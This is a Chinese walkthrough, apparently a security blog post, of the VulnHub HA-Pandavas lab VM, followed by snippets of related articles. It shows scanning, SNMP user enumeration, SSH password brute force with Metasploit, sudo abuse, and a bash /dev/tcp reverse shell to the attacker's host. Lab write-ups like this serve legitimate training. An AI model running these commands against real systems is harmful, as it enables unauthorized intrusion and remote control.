vulnhub之ha-pandavas的实践

VSole2023-05-22 09:06:52

今天实践的是vulnhub的ha-pandavas镜像,

下载地址,https://download.vulnhub.com/ha/pandavas.zip,

用workstation打开,首先做地址扫描,

sudo netdiscover -r 192.168.177.0/24,

获取到靶机地址192.168.177.135,

再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.177.135

再继续做udp端口的扫描,sudo nmap -sU -p161 192.168.177.135,

有snmp服务,walk一下,snmpwalk -v1 -c public 192.168.177.135,

获取到用户名,karna,

有web服务,浏览器访问,http://192.168.177.135,

爬取字典,cewl http://192.168.177.135 > dict.txt,

使用metasploit进行ssh暴力破解,msfconsole,

use auxiliary/scanner/ssh/ssh_login

set RHOSTS 192.168.177.135

set USERNAME karna

set PASS_FILE /home/kali/dict.txt

exploit

获取到karna/Surya,直接ssh登录,

ssh karna@192.168.177.135,

查看到其它账户,暴力破解改名,set USERNAME krishna,

继续获取到krishna/Bhagavad,切到krishna,

sudo -l确认可以root身份执行任何程序,

kali攻击机那边用nc开个反弹shell监听,nc -lvp 4444,

靶机这边执行,sudo -u root bash -i >& /dev/tcp/192.168.177.131/4444 0>&1,

kali攻击机这边获取到反弹shell,确认是root,

本周的实践到此结束,本周的实践到此结束,本周的实践到此结束,本周的实践到此结束,本周的实践到此结束。

sshsudo
本作品采用《CC 协议》,转载必须注明作者和本文链接
今天实践的是vulnhub的Corrosion2镜像, 下载地址,https://download.vulnhub.com/corrosion/Corrosion2.ova, 用workstation导入成功,能扫描到地址, sudo netdiscover -r 192.168.137.0/24,
vulnhub之five86的实践
2022-04-05 12:20:23
今天实践的是vulnhub的five86镜像,下载地址, https://download.vulnhub.com/five86/Five86-1.zip, 用workstation导入成功,先做地址扫描, sudo netdiscover -r 192.168.137.0/24,
名称:(家庭)难度:中等创作者:cromiphi发布日期:2021-04-30目标:user.txt和falg.txt,root权限搭建靶机下载完Family.ova后,使用Oracle VM VirtualBox导入即可导入时注意!!
随着 Windows 10 IoT 的发布,我们也将可以用上运行 Windows 的树莓派。自问世以来,受众多计算机发烧友和创客的追捧,曾经一“派”难求。然后进入文件夹可以看到一个 img 的镜像,大小为 1.7GB 左右。把内存卡插入读卡器后,插入电脑。我们进入 boot 分区内,然后新建一个名为 ssh 的文件,注意不要后缀名!!!!
Raspberry Pi(中文名为树莓派,简写为 RPi,(或者 RasPi / RPI) 是为学习计算机编程教育而设计),只有信用卡大小的微型电脑,其系统基于 Linux。随着 Windows 10 IoT 的发布,我们也将可以用上运行 Windows 的树莓派。 自问世以来,受众多计算机发烧友和创客的追捧,曾经一“派”难求。别看其外表“娇小”,内“心”却很强大,视频、音频等功能通通皆有,可谓
提及 Redis 自然是耳熟能详,说起 Redis 的漏洞的话,未授权访问漏洞、主从复制漏洞等也是张口就来,所以打算对 Redis 进行一个全面的总结。
九种DC靶机渗透测试
2023-01-07 11:14:37
点击上方蓝字 关注安全知识DC-1靶机测试1.DC-1靶机安装安装进去后,修改网络设置为nat模式2.靶机
Raspberry Pi(中文名为树莓派,简写为 RPi,(或者 RasPi / RPI) 是为学习计算机编程教育而设计),只有信用卡大小的微型电脑,其系统基于 Linux。随着 Windows 10 IoT 的发布,我们也将可以用上运行 Windows 的树莓派。
SSH代理转发
2022-03-04 22:03:04
浏览器开启代理SOCK5可以看到IP发生变化四、SSH本地转发网络拓扑图1.kali能与边界服务器互通。这里用ubuntu作为边界服务器sudo apt-get install openssh-server //安装SSH服务
PersistenceIsFutile,8个后门。虽然说用脚本跑下就基本全出来了,但我还是想要个矜持的
VSole
网络安全专家